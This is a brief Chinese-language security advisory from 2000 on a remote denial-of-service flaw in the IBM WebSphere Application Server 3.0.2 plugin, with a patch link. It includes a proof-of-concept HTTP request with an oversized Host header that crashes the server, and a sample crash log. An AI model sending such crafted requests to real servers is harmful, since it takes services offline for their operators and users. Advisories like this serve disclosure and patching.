WebSphere Application Server plugin拒绝服务攻击漏洞

发布时间：2000-09-25
更新时间：2000-09-25
严重程度：中
威胁程度：远程拒绝服务
错误类型：输入验证错误
利用方式：服务器模式

受影响系统

IBM Websphere Application Server 3.0.2

详细描述
在Host:请求中发送大量的数据如1092字符会导致WEB服务程序处理错误的信号，如
signal 11 (SIGSEGV) 或者 signal 10 (SIGBUS).

测试代码
GET /servletsnoop HTTP/1.0
Host: xxxxxxxxxxxxxxxxxxxxxxxx(1092+ characters)

在IBMHTTPD记录将增加：

[Fri May 26 12:00:54 2000] [notice] child pid 11306 exit signal Segmentation
Fault (11)

解决方案
下载IBM Websphere Application Server 3.0.2:

IBM patch WAS 3.0.2 fix pack 2
http://www-4.ibm.com/software/webservers/appserv/efix.html

相关信息

最近严重漏洞

WebSphere Application Server plugin拒绝服务攻击漏洞